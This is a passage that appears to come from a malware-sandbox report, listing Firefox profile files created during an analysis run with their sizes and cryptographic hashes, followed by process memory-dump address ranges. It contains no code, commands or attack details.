        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\735771e9-f2f0-4530-b815-a36b556c568b

          Filesize

          886B

          MD5

          be681fe83e7fb935ffdde348211af7aa

          SHA1

          1fa7bd25896f447630c8287f5cce556685480fdd

          SHA256

          3ed01d31724e580b1b4c691b688f4702cffbbe19f9efc76059e8dbcef0fe0a80

          SHA512

          c6c4b1aa953f41c610e18148c7e56bc6f5ce2e1db4a8dce85c6b8a8fe7ac5d5db390f9c204795ab70bc30909bf2a3c7d74a89075eb5f5032794a208ba8011be6

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\b0635795-a763-4abc-a336-0fd165d4a0f0

          Filesize

          235B

          MD5

          1cf4057d56d1d99bfdb742f3db2d006b

          SHA1

          832fd2bf851a70cb05f787debe8a00035ad60c49

          SHA256

          6cd528d62ea6a66c4a88ae056d06566f08edc377cd0a552203c8a74f1b9ce2ff

          SHA512

          677c76af5dcde1ce5b2e1e4c12bb1bac97df2e812d7e066f1ec016013641f7120a318df758b724c53248aaad4dfefbad1c903893ec2cc9f20e7e03c83939730e

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\extensions.json

          Filesize

          16KB

          MD5

          c7f42858f29c388c5a59af9092b881ee

          SHA1

          c1a8f5c509422d2d4c6e115627681f991795f650

          SHA256

          d1b9020f9e397a6565fccf25ab5fb0d7566dc97792aba42c1694668d520f10d6

          SHA512

          3f40a0e499eaa7535efd4f054d970ac4dfc07cbf310708fc6535498768ad65c387c3496cf8bb83609a8d02a3df02fd9dd686885c3953880ed1d66bdcd3a94c79

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll

          Filesize

          1.1MB

          MD5

          626073e8dcf656ac4130e3283c51cbba

          SHA1

          7e3197e5792e34a67bfef9727ce1dd7dc151284c

          SHA256

          37c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651

          SHA512

          eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info

          Filesize

          116B

          MD5

          ae29912407dfadf0d683982d4fb57293

          SHA1

          0542053f5a6ce07dc206f69230109be4a5e25775

          SHA256

          fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6

          SHA512

          6f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json

          Filesize

          1001B

          MD5

          32aeacedce82bafbcba8d1ade9e88d5a

          SHA1

          a9b4858d2ae0b6595705634fd024f7e076426a24

          SHA256

          4ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce

          SHA512

          67dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll

          Filesize

          18.5MB

          MD5

          1b32d1ec35a7ead1671efc0782b7edf0

          SHA1

          8e3274b9f2938ff2252ed74779dd6322c601a0c8

          SHA256

          3ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648

          SHA512

          ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\prefs-1.js

          Filesize

          6KB

          MD5

          06042321255eea37035a46dc253dab61

          SHA1

          a1129ecfa41a2324fb84e06f07437d90c2df0960

          SHA256

          03a592e8073b8a71eb7bf92bb9b5e0378b513676c51dfb088c5e8dd36c3511ac

          SHA512

          d2933588fb97db5e498b89e86ead0ec1bd78e927cdb498e54b86ee590ead2520fdddb39eae082d2f4ecdd6e0c402fe1f7da78c1f9ca6ecc561e7d476312eb86d

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\prefs-1.js

          Filesize

          8KB

          MD5

          8350154b308d9b677e3a1049a78d6ae4

          SHA1

          d618cdac57f29c900272aeb66205f8f128d06a05

          SHA256

          46573a8bff4f7452a7c5b2e75229d75e6314c65067320476f77d68de20f46e46

          SHA512

          5e4c451a70ccac6e169d415cb3691bf69bdf5ef8dd4fe2cb2036943c2c36d09f5f8e6c02289158b4999e9f1ab902de809d9962659480449627c5c7d9818cfbab

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\prefs.js

          Filesize

          6KB

          MD5

          16b06ecc3b58a85b3d6f0b77dee022cb

          SHA1

          49957896a85c4a1d31e27fec7cb0f3749b91b49e

          SHA256

          a359aa4e12cd5efb9bae959a55dd11cfba05dc7191d93614ba8e8f73e38563eb

          SHA512

          33cb8b975721f26a3f205a990a9488371f1c94c6bd0adee37328d1ac407523f3fe3b64b5e5bfabb3291f0dab1e7663d5a72ecb2c052e301030783af1af6c22b3

        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\sessionstore-backups\recovery.baklz4

          Filesize

          1KB

          MD5

          fd1e51887c40e96ac21adedafc406aa5

          SHA1

          64bb50e185819371c9cf87e9a4a30d481f0958bc

          SHA256

          e66c8deb9919614518c048032640647a093d47def7fdd27d6b851dc4d4e81583

          SHA512

          62cf2f668139b925c4f13c8b6aaefe6c8e4b683dbccd6c95bdeb3bbcfac7159793c6a1ff2f45c50803c0841a434ea5fe12a7a22eaf0d88109f6f68d2ee4d3dc0

        • memory/904-49-0x0000000000570000-0x0000000000A28000-memory.dmp

          Filesize

          4.7MB

        • memory/904-35-0x0000000000570000-0x0000000000A28000-memory.dmp

          Filesize

          4.7MB

        • memory/1752-86-0x0000000000770000-0x0000000000E12000-memory.dmp

          Filesize

          6.6MB

        • memory/1752-84-0x0000000000770000-0x0000000000E12000-memory.dmp

          Filesize

          6.6MB

        • memory/1808-51-0x0000000000FE0000-0x0000000001498000-memory.dmp

          Filesize

          4.7MB

        • memory/1808-52-0x0000000000FE0000-0x0000000001498000-memory.dmp

          Filesize

          4.7MB

        • memory/1868-69-0x0000000000F20000-0x0000000001230000-memory.dmp

          Filesize

          3.1MB

        • memory/1868-67-0x0000000000F20000-0x0000000001230000-memory.dmp

          Filesize

          3.1MB

        • memory/2120-4-0x0000000004F70000-0x0000000004F92000-memory.dmp

          Filesize

          136KB

        • memory/2120-3-0x0000000004FD0000-0x00000000055F8000-memory.dmp

          Filesize

          6.2MB

        • memory/2120-2-0x0000000002830000-0x0000000002866000-memory.dmp

          Filesize

          216KB

        • memory/2120-19-0x0000000007750000-0x0000000007DCA000-memory.dmp

          Filesize

          6.5MB

        • memory/2120-6-0x00000000057E0000-0x0000000005846000-memory.dmp

          Filesize

          408KB

        • memory/2120-5-0x0000000005770000-0x00000000057D6000-memory.dmp

          Filesize

          408KB

        • memory/2120-16-0x0000000005950000-0x0000000005CA4000-memory.dmp

          Filesize

          3.3MB

        • memory/2120-25-0x0000000008380000-0x0000000008924000-memory.dmp

          Filesize

          5.6MB

        • memory/2120-17-0x0000000005E10000-0x0000000005E2E000-memory.dmp

          Filesize

          120KB

        • memory/2120-18-0x0000000005E60000-0x0000000005EAC000-memory.dmp

          Filesize

          304KB

        • memory/2120-23-0x0000000007370000-0x0000000007406000-memory.dmp

          Filesize

          600KB

        • memory/2120-20-0x0000000006360000-0x000000000637A000-memory.dmp

          Filesize

          104KB

        • memory/2120-24-0x00000000072D0000-0x00000000072F2000-memory.dmp

          Filesize

          136KB

        • memory/3400-68-0x0000000000FE0000-0x0000000001498000-memory.dmp

          Filesize

          4.7MB

        • memory/3400-566-0x0000000000FE0000-0x0000000001498000-memory.dmp

          Filesize

          4.7MB

        • memory/3400-856-0x0000000000FE0000-0x0000000001498000-memory.dmp

          Filesize

          4.7MB

        • memory/3400-70-0x0000000000FE0000-0x0000000001498000-memory.dmp

          Filesize

          4.7MB

        • memory/3400-851-0x0000000000FE0000-0x0000000001498000-memory.dmp

          Filesize

          4.7MB

        • memory/3400-863-0x0000000000FE0000-0x0000000001498000-memory.dmp

          Filesize

          4.7MB

        • memory/3400-544-0x0000000000FE0000-0x0000000001498000-memory.dmp

          Filesize

          4.7MB

        • memory/3400-862-0x0000000000FE0000-0x0000000001498000-memory.dmp

          Filesize

          4.7MB

        • memory/3400-567-0x0000000000FE0000-0x0000000001498000-memory.dmp

          Filesize

          4.7MB

        • memory/3400-104-0x0000000000FE0000-0x0000000001498000-memory.dmp

          Filesize

          4.7MB

        • memory/3400-47-0x0000000000FE0000-0x0000000001498000-memory.dmp

          Filesize

          4.7MB

        • memory/3400-860-0x0000000000FE0000-0x0000000001498000-memory.dmp

          Filesize

          4.7MB

        • memory/4772-152-0x00000000006F0000-0x0000000000B4E000-memory.dmp

          Filesize

          4.4MB

        • memory/4772-443-0x00000000006F0000-0x0000000000B4E000-memory.dmp

          Filesize

          4.4MB

        • memory/4772-546-0x00000000006F0000-0x0000000000B4E000-memory.dmp

          Filesize

          4.4MB

        • memory/4772-442-0x00000000006F0000-0x0000000000B4E000-memory.dmp

          Filesize

          4.4MB

        • memory/4772-556-0x00000000006F0000-0x0000000000B4E000-memory.dmp

          Filesize

          4.4MB

        • memory/5268-853-0x0000000000FE0000-0x0000000001498000-memory.dmp

          Filesize

          4.7MB

        • memory/5772-543-0x00000000006A0000-0x0000000000B4E000-memory.dmp

          Filesize

          4.7MB

        • memory/5772-545-0x00000000006A0000-0x0000000000B4E000-memory.dmp

          Filesize

          4.7MB